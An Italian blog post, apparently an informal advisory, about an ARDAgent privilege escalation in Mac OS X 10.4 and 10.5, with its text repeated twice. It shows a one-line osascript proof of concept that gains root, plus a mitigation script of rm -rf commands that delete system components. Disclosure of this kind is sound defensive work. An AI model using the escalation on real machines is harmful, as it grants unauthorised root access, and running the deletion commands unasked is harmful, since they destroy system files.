Bug in MacOsX permette l'elevazione dei privilegi tramite applescript
Come da titolo. :-)
tramite un semplice AppleScript e' possibile elevare i privilegi di un normale utente fino a farlo diventare root:
[sourcecode language='xml']
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
[/sourcecode]
Il bug sarebbe presente su MacOsX 10.4 Tiger e 10.5 Leopard e interessa il server dell' AppleRemoteDesktop.
L'escalation di privilegi puo' avvenire solamente avendo accesso fisico alla macchina, attualmente non sembra essere possibile sfruttarlo da remoto.
In attesa che Apple rilasci una fix, e' possibile disabilitare AppleRemoteDesktop utilizzando questo script:
[sourcecode language='xml']
## Remove old components
rm -rf "/Applications/Remote Desktop.app"
rm -rf "/System/Library/CoreServices/ARD Agent.app"
rm -rf "/System/Library/CoreServices/RemoteManagement"
rm -rf "/Library/Receipts/RemoteDesktop"*
## Remove preferences
rm -rf "/Users/[ADMIN USER NAME]/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.ARDAgent.plist"
rm -rf "/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.RemoteManagement.plist"
## Remove local database
rm -rf "/var/db/RemoteManagement"
[/sourcecode]
tramite un semplice AppleScript e' possibile elevare i privilegi di un normale utente fino a farlo diventare root:
[sourcecode language='xml']
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
[/sourcecode]
Il bug sarebbe presente su MacOsX 10.4 Tiger e 10.5 Leopard e interessa il server dell' AppleRemoteDesktop.
L'escalation di privilegi puo' avvenire solamente avendo accesso fisico alla macchina, attualmente non sembra essere possibile sfruttarlo da remoto.
In attesa che Apple rilasci una fix, e' possibile disabilitare AppleRemoteDesktop utilizzando questo script:
[sourcecode language='xml']
## Remove old components
rm -rf "/Applications/Remote Desktop.app"
rm -rf "/System/Library/CoreServices/ARD Agent.app"
rm -rf "/System/Library/CoreServices/RemoteManagement"
rm -rf "/Library/Receipts/RemoteDesktop"*
## Remove preferences
rm -rf "/Users/[ADMIN USER NAME]/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.ARDAgent.plist"
rm -rf "/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.RemoteManagement.plist"
## Remove local database
rm -rf "/var/db/RemoteManagement"
[/sourcecode]